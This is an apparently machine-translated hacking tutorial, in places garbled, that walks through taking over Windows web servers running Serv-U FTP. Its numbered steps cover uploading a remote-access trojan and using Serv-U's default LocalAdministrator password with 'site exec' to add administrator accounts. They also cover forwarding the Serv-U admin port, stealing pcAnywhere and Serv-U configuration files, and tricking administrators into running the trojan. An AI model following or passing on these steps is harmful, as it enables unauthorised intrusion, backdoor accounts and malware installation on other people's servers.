I. First, check whether the website server has opened the 3389 remote terminal.
Ii. Check whether serv-u is used for the Service (what version is available)
Method
I. Copy a website and connect it with the 3389 login device (whether it is successful)
The connection is available. The chance of winning the server is increased by 30%.
Ii. Check the next server version in ftp mode.
Start -- run -- cmd -- ftp (add the website you want to log on)
Bytes ---------------------------------------------------------------------------------------
Step 1: The simplest method
Check whether you have the permission to execute the command. If you want to execute the command, directly upload a pigeon to run the command (the success rate is very low)
Bytes ----------------------------------------------------------------------------------------
Step 2: Find the directory with the execution permission
C: winntsystem32inetsrvdata
C: Documents and SettingsAll Users
C: Program Filesserv-u
C: Program FilesMicrosoft SQL Server
Such a directory can be directly uploaded and run
Bytes -----------------------------------------------------------------------------------
Step 3: directly add an account to the ftp.exe file of the personal account and Account Opening
The command is to upload the Directory D: VMware workstationconfigur.exe "net user xiao/add"
Bytes -----------------------------------------------------------------------------------
Step 4: asp Privilege Escalation Trojan directly Privilege Escalation
Serv-u 6.3 seems to have used an asp Privilege Escalation Trojan (unsuccessful)
Serv-u 6.2 seems to be okay.
However, the attacker cannot use asp Trojans to view servers.
It is assumed that after the authentication is directly obtained using asp, it is still unsuccessful, but you can
Use this account to connect to cmd.
Ftp (website with your Elevation of Privilege)
Account: LocalAdministrator password: $ ak #. 1 k; 0 @ p "> #1 @ $ ak #. 1 k; 0 @ p
If the connection is successful, you can directly add an administrator account.
Command: quote site exec (the account you added). net user 123 123/ad
Quote site exec (escalate the account to the highest permission) net localgroup administartors 123/add
Bytes ---------------------------------------------------------------------------------------
Step 5: pcaanywhere
C: Documents and SettingsAll UsersApplication DataSymantecpcAnywhere
Download his GIF file and install pcanywhere locally.
Many tutorials on the Internet
Bytes ---------------------------------------------------------------------------------------
Step 6: Enable serv-u Overwrite
Install a local su and use the ServUDaemon. ini file downloaded from him.
Many tutorials on the Internet
Bytes ----------------------------------------------------------------------------------------
Step 7: Serv-U forwarding Port
I used this method to add salt to Latte (a full set of tutorials on serv-u classic Privilege Escalation). You can learn it.
Upload port forwarding tools
Command: (Tool Name)-v-l 3333-r 43958 127.0.0.1
It means to map port 3333 to port 43958. Then you can install a Serv-u locally and create a new server,
Fill in the IP address of the other party. The password for the Account LocalAdministrator is $ ak #. 1 k; 0 @ p "> #1 @ $ ak #. 1 k; 0 @ p,
After the connection, you can manage his Serv-u.
Bytes --------------------------------------------------------------------------------------------
Step 8: Elevation of Privilege in social engineering
Transfer the gray pigeon to the above, and then transfer it to the drive C, and then wait for the Administrator to run, so that your pigeon must not be killed
If you want me to see an unclear exe program, I 'd like to open it)